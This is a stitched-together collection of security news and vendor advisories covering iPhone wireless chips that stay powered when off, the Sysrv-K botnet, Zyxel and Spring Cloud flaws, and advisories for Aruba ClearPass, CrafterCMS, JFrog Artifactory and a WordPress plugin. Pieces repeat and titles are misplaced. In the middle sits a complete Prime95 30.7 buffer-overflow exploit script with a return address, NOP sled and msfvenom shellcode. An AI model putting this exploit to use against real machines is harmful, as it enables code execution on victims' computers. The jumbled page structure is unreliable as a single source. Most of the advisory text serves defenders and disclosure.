Wireless features Bluetooth, NFC and UWB stay on even when the device is powered down, which could allow attackers to execute pre-loaded malware.

Wireless features Bluetooth, NFC and UWB stay on even when the device is powered down, which could allow attackers to execute pre-loaded malware.

Attackers can target iPhones even when they are turned off due to how Apple implements standalone wireless features Bluetooth, Near Field Communication (NFC ) and Ultra-wideband ( UWB) technologies in the device, researchers have found.

These features—which have access to the iPhone’s Secure Element (SE), which stores sensitive info–stay on even when modern iPhones are powered down, a team of researchers from Germany’s Technical University of Darmstadt discovered.

This makes it possible, for example, “to load malware onto a Bluetooth chip that is executed while the iPhone is off,” they wrote in a research paper titled “Evil Never Sleeps: When Wireless Malware Stays On After Turning Off iPhone.”

By compromising these wireless features, attackers can then go on to access secure info such as a user’s credit card data, banking details or even digital car keys on the device, researchers Jiska Classen, Alexander Heinrich, Robert Reith and Matthias Hollick of the university’s Secure Mobile Networking Lab disclosed in the paper.

Though the risk is real, exploiting the scenario is not so straightforward for would-be attackers, researchers acknowledged. Threat actors would still need to load the malware when the iPhone is on for later execution when it’s off, they said. This would require system-level access or remote code execution (RCE), the latter of which they could gain by using known flaws, such as BrakTooth, researchers said.

****Root of the Issue****

The root cause of the issue is the current implementation of low power mode (LPM) for wireless chips on iPhones, researchers detailed in the paper. The team differentiated between the LPM that these chips run on versus the power-saving app that iPhone users can enable on their phones to save battery life.

The LPM at issue is “either activated when the user switches off their phone or when iOS shuts down automatically due to low battery,” they wrote.

While the current LPM implementation on iPhones increases “the user’s security, safety, and convenience in most situations,” it also “adds new threats,” researchers said.

LPM support is based on the iPhone’s hardware, so it can’t be removed with system updates and thus has “a long-lasting effect on the overall iOS security model,” they said.

“The Bluetooth and UWB chips are hardwired to the \[SE\] in the NFC chip, storing secrets that should be available in LPM,” researchers explained. “Since LPM support is implemented in hardware, it cannot be removed by changing software components. As a result, on modern iPhones, wireless chips can no longer be trusted to be turned off after shutdown. This poses a new threat model.”

****Sample Threat Scenario****

Researchers analyzed the security of LPM features in a layered approach, observing the impact of the feature on application-, firmware- and hardware-level security.

For example, a potential threat scenario that they outlined on the iPhone’s firmware assumes that an attacker either has system-level access or can gain remote code execution (RCE) using a known Bluetooth vulnerability, such as the aforementioned Braktooth flaw.

In this attack, a threat actor with system-level access could modify firmware of any component that supports LPM, researchers said. This way, they maintain control, albeit limited, of the iPhone even when the user powers it off, researchers said.

“This might be interesting for persistent exploits used against high-value targets, such as journalists,” they wrote.

In the case of leveraging an RCE flaw, actors have a smaller attack surface but could still access data via NFC Express Mode, Bluetooth and UWB DCK 3.0, researchers note. However, “Apple already minimizes the attack surface by only enabling these features on demand,” they wrote.

Even if all firmware would be protected against manipulation, an attacker with system-level access could still send custom commands to chips that “allow a very fine-grained configuration, including advertisement rotation intervals and contents,” researchers noted.

This could allow an attacker to create settings that would allow them to locate a user’s device even more accurately than the legitimate user in the Find My application, for example.

****Apple’s Response and Potential Mitigation****

Before publishing the paper, researchers reported their research to Apple, which didn’t provide feedback on the issues raised by their findings, they said.

A potential solution to the scenario would be for Apple to add “a hardware-based switch to disconnect the battery” so these wireless elements wouldn’t have power while an iPhone is powered down, researchers said.

“This would improve the situation for privacy-concerned users and surveillance targets like journalists,” they noted.

iPhones Vulnerable to Attack Even When Turned Off

Microsoft is warning of a new variant of the srv botnet that's exploiting multiple security flaws in web applications and databases to install coin miners on both Windows and Linux systems.
The tech giant, which has called the new version Sysrv-K, is said to weaponize an array of exploits to gain control of web servers. The cryptojacking botnet first emerged in December 2020.
"Sysrv-K scans the

Microsoft is warning of a new variant of the **srv botnet** that's exploiting multiple security flaws in web applications and databases to install coin miners on both Windows and Linux systems.

The tech giant, which has called the new version **Sysrv-K**, is said to weaponize an array of exploits to gain control of web servers. The cryptojacking botnet first emerged in December 2020.

"Sysrv-K scans the internet to find web servers with various vulnerabilities to install itself," the company said in a series of tweets. "The vulnerabilities range from path traversal and remote file disclosure to arbitrary file download and remote code execution vulnerabilities."

This also includes CVE-2022-22947 (CVSS score: 10.0), a code injection vulnerability in Spring Cloud Gateway that could be exploited to allow arbitrary remote execution on a remote host via a maliciously crafted request.

It's worth noting that the abuse of CVE-2022-22947 has prompted the U.S. Cybersecurity and Infrastructure Security Agency to add the flaw to its Known Exploited Vulnerabilities Catalog.

A key differentiator is that Sysrv-K scans for WordPress configuration files and their backups to fetch database credentials, which are then used to hijack web servers. It's also said to have upgraded its command-and-control communication functions to make use of a Telegram Bot.

Once infected, lateral movement is facilitated through SSH keys available on the victim machine to deploy copies of the malware to other systems and grow the botnet's size, effectively putting the entire network at risk.

"The Sysrv malware takes advantage of known vulnerabilities to spread their Cryptojacking malware," Lacework Labs researchers noted last year. "Ensuring public facing applications are kept up to date with the latest security patches is critical to avoid opportunistic adversaries from compromising systems."

Besides securing internet-exposed servers, Microsoft is additionally advising organizations to apply security updates in a timely fashion and build credential hygiene to reduce risk.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

New Sysrv Botnet Variant Hijacking Windows and Linux with Crypto Miners

Image source: z3r00t
The U.S. Cybersecurity and Infrastructure Security Agency on Monday added two security flaws, including the recently disclosed remote code execution bug affecting Zyxel firewalls, to its Known Exploited Vulnerabilities Catalog, citing evidence of active exploitation.
Tracked as CVE-2022-30525, the vulnerability is rated 9.8 for severity and relates to a command injection flaw

The U.S. Cybersecurity and Infrastructure Security Agency on Monday added two security flaws, including the recently disclosed remote code execution bug affecting Zyxel firewalls, to its Known Exploited Vulnerabilities Catalog, citing evidence of active exploitation.

Tracked as CVE-2022-30525, the vulnerability is rated 9.8 for severity and relates to a command injection flaw in select versions of the Zyxel firewall that could enable an unauthenticated adversary to execute arbitrary commands on the underlying operating system.

Impacted devices include -

*   USG FLEX 100, 100W, 200, 500, 700
*   USG20-VPN, USG20W-VPN
*   ATP 100, 200, 500, 700, 800, and
*   VPN series

The issue, for which patches were released by the Taiwanese firm in late April (ZLD V5.30), became public knowledge on May 12 following a coordinated disclosure process with Rapid7.

Merely a day later, the Shadowserver Foundation said it began detecting exploitation attempts, with most of the vulnerable appliances located in France, Italy, the U.S., Switzerland, and Russia.

Also added by CISA to the catalog is CVE-2022-22947, another code injection vulnerability in Spring Cloud Gateway that could be exploited to allow arbitrary remote execution on a remote host by means of a specially crafted request.

The vulnerability is rated 10 out of 10 on the CVSS vulnerability scoring system and has since been addressed in Spring Cloud Gateway versions 3.1.1 or later and 3.0.7 or later as of March 2022.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Watch Out! Hackers Begin Exploiting Recent Zyxel Firewalls RCE Vulnerability

A authenticated remote command injection vulnerability was discovered in Aruba ClearPass Policy Manager version(s): 6.10.4 and below, 6.9.9 and below, 6.8.9-HF2 and below, 6.7.x and below. Aruba has released updates to ClearPass Policy Manager that address this security vulnerability.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Aruba Product Security Advisory =============================== Advisory ID: ARUBA-PSA-2022-007 CVE: CVE-2021-21419, CVE-2021-33503, CVE-2022-23657, CVE-2022-23658, CVE-2022-23659, CVE-2022-23660, CVE-2022-23661, CVE-2022-23662, CVE-2022-23663, CVE-2022-23664, CVE-2022-23665, CVE-2022-23666, CVE-2022-23667, CVE-2022-23668, CVE-2022-23669, CVE-2022-23670, CVE-2022-23671, CVE-2022-23672, CVE-2022-23673, CVE-2022-23674, CVE-2022-23675 Publication Date: 2022-May-04 Status: Confirmed Severity: Critical Revision: 1 Title ===== ClearPass Policy Manager Multiple Vulnerabilities Overview ======== Aruba has released updates to ClearPass Policy Manager that address multiple security vulnerabilities. Affected Products ================= These vulnerabilities affect ClearPass Policy Manager running the following patch versions unless specifically noted otherwise in the details section: - ClearPass Policy Manager 6.10.x: 6.10.4 and below - ClearPass Policy Manager 6.9.x: 6.9.9 and below - ClearPass Policy Manager 6.8.x: 6.8.9-HF2 and below Updating ClearPass Policy Manager to a patch version listed in the Resolution section at the end of this advisory will resolve all issues in the details section. Versions of ClearPass Policy Manager that are end of life should be considered to be affected by these vulnerabilities unless otherwise indicated. Impacted customers should plan to migrate to a supported version. Versions that should be considered to be vulnerable and not addressed by this advisory include: - ClearPass Policy Manager 6.7.x and below Details ======= Authentication Bypass Leading to Remote Code Execution in ClearPass Policy Manager Web-Based Management Interface (CVE-2022-23657, CVE-2022-23658, CVE-2022-23660) --------------------------------------------------------------------- Vulnerabilities in the web-based management interface of ClearPass Policy Manager could allow an unauthenticated remote attacker to run arbitrary commands on the underlying host. Successful exploitation of these vulnerabilities allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise. Internal References: ATLCP-156, ATLCP-162, ATLCP-163 Severity: Critical CVSSv3.x Overall Score: 9.8 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Discovery: These vulnerabilities were discovered and reported by Daniel Jensen (@dozernz) via Aruba's Bug Bounty Program. Authenticated Information Disclosure in ClearPass Policy Manager Web-Based Management Interface (CVE-2022-23670) --------------------------------------------------------------------- A vulnerability in the web-based management interface of ClearPass Policy Manager could allow a remote attacker authenticated with low privileges to access sensitive information. A successful exploit allows an attacker to retrieve information which could be used to potentially gain further access to network services supported by ClearPass Policy Manager. Internal Reference: ATLCP-169 Severity: High CVSSv3.x Overall Score: 8.5 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N Discovery: This vulnerability was discovered and reported by Colton Bachman of Aruba Threat Labs. Sensitive Information Disclosure in ClearPass Policy Manager Cluster via Privileged Network Position (CVE-2022-23671) --------------------------------------------------------------------- A vulnerability exists in the ClearPass Policy Manager cluster communications that allow for an attacker in a privileged network position to potentially obtain sensitive information. A successful exploit could allow an attacker to retrieve information that allows for unauthorized actions as a privileged user on the ClearPass Policy Manager cluster. Internal Reference: ATLCP-182 Severity: High CVSSv3.x Overall Score: 7.5 CVSS Vector: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H Discovery: This vulnerability was discovered and reported by the Central College Security Team. Authenticated Stored Cross-Site Scripting Vulnerability (XSS) in ClearPass Policy Manager Web-Based Management Interface (CVE-2022-23674, CVE-2022-23675) --------------------------------------------------------------------- Multiple vulnerabilities in the web-based management interface of ClearPass Policy Manager could allow an authenticated remote attacker to conduct a stored cross-site scripting (XSS) attack against an administrative user of the interface. A successful exploit allows an attacker to execute arbitrary script code in a victim’s browser in the context of the affected interface. Internal References: ATLCP-176, ATLCP-185 Severity: High CVSSv3.x Overall Score: 7.5 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L Discovery: These vulnerabilities were discovered and reported by Rahul Mohan of Aruba Networks and Daniel Jensen (@dozernz) via Aruba's Bug Bounty Program. Authenticated Remote Command Injection in ClearPass Policy Manager Command Line Interface Leading to Full System Compromise (CVE-2022-23661, CVE-2022-23662) --------------------------------------------------------------------- Vulnerabilities in the ClearPass Policy Manager command line interface allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise. Internal References: ATLCP-77, ATLCP-107 Severity: High CVSSv3.x Overall Score: 7.2 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H Discovery: These vulnerabilities were discovered and reported by Erik De Jong (bugcrowd.com/erikdejong) via Aruba's Bug Bounty Program. Authenticated Remote Command Injection in ClearPass Policy Manager Web-Based Management Interface Leading to Full System Compromise (CVE-2022-23663, CVE-2022-23664, CVE-2021-23665, CVE-2022-23666, CVE-2022-23672, CVE-2022-23673) --------------------------------------------------------------------- Vulnerabilities in the ClearPass Policy Manager web-based management interface allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise. Internal References: ATLCP-140, ATLCP-141, ATLCP-157, ATLCP-160, ATLCP-161, ATLCP-172 Severity: High CVSSv3.x Overall Score: 7.2 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H Discovery: These vulnerabilities were discovered and reported by Daniel Jensen (@dozernz) via Aruba's Bug Bounty Program. Reflected Cross Site Scripting Vulnerability (XSS) in ClearPass Policy Manager Web-Based Management Interface (CVE-2022-23659) --------------------------------------------------------------------- A vulnerability within the web-based management interface of ClearPass Policy Manager could allow a remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of the interface. A successful exploit could allow an attacker to execute arbitrary script code in a victim’s browser in the context of the affected interface. Internal Reference: ATLCP-181 Severity: Medium CVSSv3.x Overall Score: 6.6 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L Discovery: This vulnerability was discovered and reported by the Memorial Hermann Security Team. Improper Handling of Highly Compressed Data (Data Amplification) and Memory Allocation with Excessive Size Value in Python Eventlet Library (CVE-2021-21419) -------------------------------------------------------------------- A vulnerability exists in the Python Eventlet library used by ClearPass Policy Manager. This could allow a WebSocket peer to exhaust memory reserved by Eventlet inside of ClearPass Policy Manager leading to a partial Denial of Service condition in services that use the library. For more details, please refer to https://github.com/advisories/GHSA-9p9m-jm8w-94p2 Internal Reference: ATLCP-158 Severity: Medium CVSSv3.x Overall Score: 5.3 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L Discovery: This vulnerability was discovered by the maintainers of the Eventlet repository on GitHub. Authorization Bypass in ClearPass Policy Manager via Insufficient Session Expiration (CVE-2022-23669) --------------------------------------------------------------------- A vulnerability exists in the handling of SAML token expiration by ClearPass Policy Manager. A successful exploit could allow an attacker in the possession of a valid token to reuse the token after session expiration, thereby achieving a bypass of the normal authorization process. Internal Reference: ATLCP-171 Severity: Medium CVSSv3.x Overall Score: 5.0 CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L Discovery: This vulnerability was discovered and reported by Tomas Rzepka of F-Secure. Authenticated Denial-of-Service Condition in Python Urllib Library Used by ClearPass Policy Manager (CVE-2021-33503) -------------------------------------------------------------------- A vulnerability exists in the Python Urllib library used by ClearPass Policy Manager. An authenticated attacker can exploit this condition via the web-based management interface to create a denial-of-service condition in the interface. For more details, please refer to https://github.com/advisories/GHSA-q2q7-5pp4-w6pg Internal Reference: ATLCP-165 Severity: Medium CVSSv3.x Overall Score: 4.9 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H Discovery: This vulnerability was discovered by Nariyoshi Chida. Authenticated Remote Command Injection in ClearPass Policy Manager Command Line Interface Leading to Partial System Compromise (CVE-2022-23667) --------------------------------------------------------------------- A vulnerability in the ClearPass Policy Manager command line interface allows remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as a lower privileged user on the underlying operating system leading to partial system compromise. Internal Reference: ATLCP-92 Severity: Medium CVSSv3.x Overall Score: 4.7 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L Discovery: This vulnerability was discovered and reported by Daniel Jensen (@dozernz) via Aruba's Bug Bounty Program. Authenticated Server-Side Request Forgery (SSRF) Leading to Information Disclosure (CVE-2022-23668) --------------------------------------------------------------------- A vulnerability in the web-based management interface of ClearPass Policy Manager could allow an unauthenticated remote attacker to conduct a server-side request forgery (SSRF) attack. A successful exploit allows an attacker to enumerate information about the internal structure of the ClearPass Policy Manager host leading to potential disclosure of sensitive information. Internal Reference: ATLCP-124 Severity: Medium CVSSv3.x Overall Score: 4.1 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N Discovery: This vulnerability was discovered and reported by Mohammed F. Al-Barbari (bugcrowd.com/m4dm0e) via Aruba's Bug Bounty Program. Resolution ========== The vulnerabilities contained in this advisory can be addressed by patching or upgrading to one of the ClearPass Policy Manager versions listed below - ClearPass Policy Manager 6.10.x: 6.10.5 and above - ClearPass Policy Manager 6.9.x: 6.9.10 and above - ClearPass Policy Manager 6.8.x: 6.8.9-HF3 and above As a general rule, Aruba does not evaluate or patch ClearPass Policy Manager versions that have reached their End of Support (EoS) milestone. For more information about Aruba's End of Support policy visit: https://www.arubanetworks.com/support-services/end-of-life/ Workaround ========== To minimize the likelihood of an attacker exploiting these vulnerabilities, Aruba recommends that the CLI and web-based management interfaces for ClearPass Policy Manager be restricted to a dedicated layer 2 segment/VLAN and/or controlled by firewall policies at layer 3 and above ClearPass Policy Manager Security Hardening =========================================== For general information on hardening ClearPass Policy Manager instances against security threats please see the ClearPass Policy Manager Hardening Guide available at https://support.hpe.com/hpesc/public/docDisplay?docId=a00091066en\_us for ClearPass Policy Manager 6.9.x and earlier versions. For ClearPass 6.10.x the ClearPass Policy Manager Hardening Guide is available at https://www.arubanetworks.com/techdocs/ClearPass/6.10/PolicyManager/Content/home.htm Exploitation and Public Discussion ================================== Aruba is not aware of any public discussion or exploit code that target these specific vulnerabilities as of the release date of the advisory. Revision History ================ Revision 1 / 2022-May-04 / Initial release Aruba SIRT Security Procedures ============================== Complete information on reporting security vulnerabilities in Aruba Networks products and obtaining assistance with security incidents is available at: https://www.arubanetworks.com/support-services/security-bulletins/ For reporting \*NEW\* Aruba Networks security issues, email can be sent to aruba-sirt(at)hpe.com. For sensitive information we encourage the use of PGP encryption. Our public keys can be found at: https://www.arubanetworks.com/support-services/security-bulletins/ (c) Copyright 2022 by Aruba, a Hewlett Packard Enterprise company. This advisory may be redistributed freely after the release date given at the top of the text, provided that the redistributed copies are complete and unmodified, including all data and version information. -----BEGIN PGP SIGNATURE----- iQFLBAEBCAA1FiEEMd5pP5EnbG7Y0fo5mP4JykWFhtkFAmJpVl4XHHNpcnRAYXJ1 YmFuZXR3b3Jrcy5jb20ACgkQmP4JykWFhtnvWwgAnZmt6eDd2Wn2JScRccrY2gAQ nUHV7MDgqn6FRBBeRho8tpHQFaC73fSafdX9worLEFp1gUltUDDMefzpgonN0DHS ONE/tcYbwMuC6DaszY9S0MuKcdqSS6bisGsELlObi/8wP4cXZiQNEzrP9UUXX0GG OkRKksMg+Z5PuDjHqBaQEWu8f3jO3FX55JLZa5FWZwuGAFpi+UUfOloitYko+XvK /EayQ22dtxC+AUWPtMgxw1K0JwFO5vtqtsCDTctgbdKeomF1kkgw7KPIl3cvX6E+ fcL4KEFnGMXmrXislYFJXwsCWhax/ig7HC407k0U+m7Xx6AqqdmkzRETwgcTJQ== =AuGw -----END PGP SIGNATURE-----

CVE-2022-23666

Prime95 30.7 build 9 suffers from a Buffer Overflow vulnerability that could lead to Remote Code Execution.

    # Exploit Title:   Prime95 Version 30.7 build 9 Buffer Overflow RCE# Discovered by: Yehia Elghaly# Discovered Date: 2022-04-25# Vendor Homepage: https://www.mersenne.org/# Software Link : https://www.mersenne.org/ftp_root/gimps/p95v307b9.win32.zip# Tested Version: 30.7 build 9# Vulnerability Type:  Buffer Overflow (RCE) Local# Tested on OS: Windows 7 Professional x86# Description: Prime95 Version 30.7 build 9 Buffer Overflow RCE# 1- How to use: open the program go to test-PrimeNet-check the square-Connections # 2- paste the contents of open.txt in the optional proxy hostname field and the calculator will openbuffer = "A" * 144jum = "\xd8\x29\xe7\x6e" #push esp # ret  |  {PAGE_EXECUTE_READ} [libhwloc-15.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\ex\libhwloc-15.dll)nop = "\x90" * 20 #Nob hot = "C" * 100#sudo msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0A\x0d" -f python -v payloadpayload =  b""payload += b"\xbb\x72\xd7\x5d\x16\xdb\xc0\xd9\x74\x24\xf4\x5d"payload += b"\x29\xc9\xb1\x31\x83\xc5\x04\x31\x5d\x0f\x03\x5d"payload += b"\x7d\x35\xa8\xea\x69\x3b\x53\x13\x69\x5c\xdd\xf6"payload += b"\x58\x5c\xb9\x73\xca\x6c\xc9\xd6\xe6\x07\x9f\xc2"payload += b"\x7d\x65\x08\xe4\x36\xc0\x6e\xcb\xc7\x79\x52\x4a"payload += b"\x4b\x80\x87\xac\x72\x4b\xda\xad\xb3\xb6\x17\xff"payload += b"\x6c\xbc\x8a\x10\x19\x88\x16\x9a\x51\x1c\x1f\x7f"payload += b"\x21\x1f\x0e\x2e\x3a\x46\x90\xd0\xef\xf2\x99\xca"payload += b"\xec\x3f\x53\x60\xc6\xb4\x62\xa0\x17\x34\xc8\x8d"payload += b"\x98\xc7\x10\xc9\x1e\x38\x67\x23\x5d\xc5\x70\xf0"payload += b"\x1c\x11\xf4\xe3\x86\xd2\xae\xcf\x37\x36\x28\x9b"payload += b"\x3b\xf3\x3e\xc3\x5f\x02\x92\x7f\x5b\x8f\x15\x50"payload += b"\xea\xcb\x31\x74\xb7\x88\x58\x2d\x1d\x7e\x64\x2d"payload += b"\xfe\xdf\xc0\x25\x12\x0b\x79\x64\x78\xca\x0f\x12"payload += b"\xce\xcc\x0f\x1d\x7e\xa5\x3e\x96\x11\xb2\xbe\x7d"payload += b"\x56\x4c\xf5\xdc\xfe\xc5\x50\xb5\x43\x88\x62\x63"payload += b"\x87\xb5\xe0\x86\x77\x42\xf8\xe2\x72\x0e\xbe\x1f"payload += b"\x0e\x1f\x2b\x20\xbd\x20\x7e\x43\x20\xb3\xe2\xaa"payload += b"\xc7\x33\x80\xb2"evil = buffer + jum + nop + payloadfile = open('PExploit.txt','w+')file.write(evil)file.close()

CVE-2022-30055: Prime95 30.7 Build 9 Buffer Overflow ≈ Packet Storm

A logged-in and authenticated user with a Reviewer Role may lock a content item.

*   

**CV-2022051603¶**

 

**Date**

2022.05.16

**Affected Versions**

**3.1** < 3.1.18

**Vulnerability Type**

CWE-913 Improper Control of Dynamically-Managed Code Resources

**Risk**

High

**Description**

Improper Control of Dynamically-Managed Code Resources vulnerability in Crafter Studio of Crafter CMS allows authenticated developers to execute OS commands via FreeMarker static methods.

**CVE**

https://www.cve.org/CVERecord?id=CVE-2021-23267

**Credit**

Kai Zhao (ToTU Security Team), https://github.com/happyhacking-k

**CV-2022051602¶**

 

**Date**

2022.05.16

**Affected Versions**

**3.1** < 3.1.18

**Vulnerability Type**

CWE-117 Improper Output Neutralization for Logs

**Risk**

Medium

**Description**

An anonymous user can craft a URL with text that ends up in the log viewer as is.The text can then include textual messages to mislead the administrator.

**CVE**

https://www.cve.org/CVERecord?id=CVE-2021-23266

**Credit**

Faizan Wani, https://github.com/faizanw8

**CV-2021120106¶**

 

**Date**

2021.12.01

**Affected Versions**

**3.1** < 3.1.15

**Vulnerability Type**

CWE-402: Transmission of Private Resources into a New Sphere (‘Resource Leak’)

**Risk**

Medium

**Description**

Transmission of Private Resources into a New Sphere (‘Resource Leak’) in CrafterEngine

**CVE**

https://www.cve.org/CVERecord?id=CVE-2021-23263

**Credit**

Carlos Ortiz, https://github.com/cortiz

**CV-2021120107¶**

 

**Date**

2021.12.01

**Affected Versions**

**3.1** < 3.1.15

**Vulnerability Type**

CWE-402: Transmission of Private Resources into a New Sphere (‘Resource Leak’) CWE-668 Exposure of Resource to Wrong Sphere

**Risk**

High

**Description**

Transmission of Private Resources into a New Sphere (‘Resource Leak’) and Exposureof Resource to Wrong Sphere in Crafter Search

**CVE**

https://www.cve.org/CVERecord?id=CVE-2021-23264

**Credit**

Sparsh Kulshrestha, https://github.com/sparshkulshrestha

**CV-2020080102¶**

 

**Date**

2020.08.01

**Affected Versions**

**3.0** < 3.0.27  
**3.1** < 3.1.7

**Vulnerability Type**

RCE

**Risk**

Medium

**Description**

Authenticated attackers with developer privileges in Crafter Studio may execute OS commands via deep inspection of FreeMarker template exposed objects.

**CVE**

https://www.cve.org/CVERecord?id=CVE-2020-25803

**Credit**

Alvaro Muñoz (GitHub), https://github.com/pwntester

**CV-2017061502¶**

 

**Date**

2017.06.15

**Affected Versions**

**3.0** < 3.0.1

**Vulnerability Type**

Directory Traversal

**Risk**

Critical

**Description**

A directory traversal vulnerability exists which allows unauthenticated attackers to overwrite files from the operating system which can lead to RCE.

**CVE**

https://www.cve.org/CVERecord?id=CVE-2017-15681

**Credit**

Jasmin Landry, https://github.com/JR0ch17

CVE-2021-23265: Security Advisories — CrafterCMS 3.1.23 documentation

Improper Control of Dynamically-Managed Code Resources vulnerability in Crafter Studio of Crafter CMS allows authenticated developers to execute OS commands via FreeMarker static methods.

CVE-2021-23267: Security Advisories — CrafterCMS 3.1.23 documentation

An anonymous user can craft a URL with text that ends up in the log viewer as is. The text can then include textual messages to mislead the administrator.

CVE-2021-23266: Security Advisories — CrafterCMS 3.1.23 documentation

JFrog Artifactory before 7.36.1 and 6.23.41, is vulnerable to Insecure Deserialization of untrusted data which can lead to DoS, Privilege Escalation and Remote Code Execution when a specially crafted request is sent by a low privileged authenticated user due to insufficient validation of a user-provided serialized object.

 Subscribe to the RSS Feed |  SUPPORT

JFrog takes the privacy and security of its customers very seriously and always strives to provide prompt notification and remediation of any vulnerabilities discovered on JFrog products. As a CVE Numbering Authority (CNA), JFrog assigns CVE identification numbers to newly discovered security vulnerabilities.

Severity

CVE

Summary

Product

Versions

Published

Updated

HIGH

**CVE-2021-3860**

JFrog Artifactory prior to version 7.25.4 (Enterprise+ deployments only), is vulnerable to Blind SQL  Injection by a low privileged authenticated user due to incomplete validation when performing an SQL query.

Artifactory

*   Versions prior to 7.25.4
*   Versions prior to 6.23.30

12/15/2021

12/15/2021

MEDIUM

**CVE-2021-45074**

JFrog Artifactory prior to7.29.3 and 6.23.38, is vulnerable to Broken Access Control, a low-privileged user is able to delete other known users OAuth token, which will force a reauthentication on an active session or in the next UI session.

Artifactory

*   Versions prior to 7.29.3
*   Versions prior to 6.23.38

03/02/2022

03/02/2022

LOW

**CVE-2021-46270**

JFrog Artifactory prior to 7.31.10, is vulnerable to Broken Access Control where a project admin user is able to list all available repository names due to insufficient permission validation.

Artifactory

*   Versions prior to 7.31.10

03/02/2022

03/02/2022

HIGH

**CVE-2022-0573**

JFrog Artifactory prior to 7.36.1 and 6.23.41, is vulnerable to Insecure Deserialization of untrusted data which can lead to DoS, Privilege Escalation, and Remote Code Execution when a specially crafted request is sent by a low privileged authenticated user due to insufficient validation of a user-provided serialized object.

Artifactory

*   Versions prior to 7.36.1
*   Versions prior to 6.34.41

12/5/2022

12/5/2022

MEDIUM

**CVE-2021-45730**

JFrog Artifactory prior to 7.31.10, is vulnerable to Broken Access Control where a Project Admin is able to create, edit and delete Repository Layouts while Repository Layouts configuration should only be available for Platform Administrators. 

Artifactory

Versions prior to 7.31.10

18/5/2022

18/5/2022

MEDIUM

**CVE-2021-41834**

JFrog Artifactory prior to versions 7.28.0 and 6.23.38, is vulnerable to Broken Access Control, the copy functionality can be used by a low-privileged user to read and copy any artifact that exists in the Artifactory deployment due to improper permissions validation.

Artifactory

*   Versions prior to 7.28.0
*   Versions prior to 6.23.38

18/5/2022

18/5/2022

CVE-2022-0573: JFrog Security Advisories - JFrog

The Advanced Uploader WordPress plugin through 4.2 allows any authenticated users like subscriber to upload arbitrary files, such as PHP, which could lead to RCE

Tag

#rce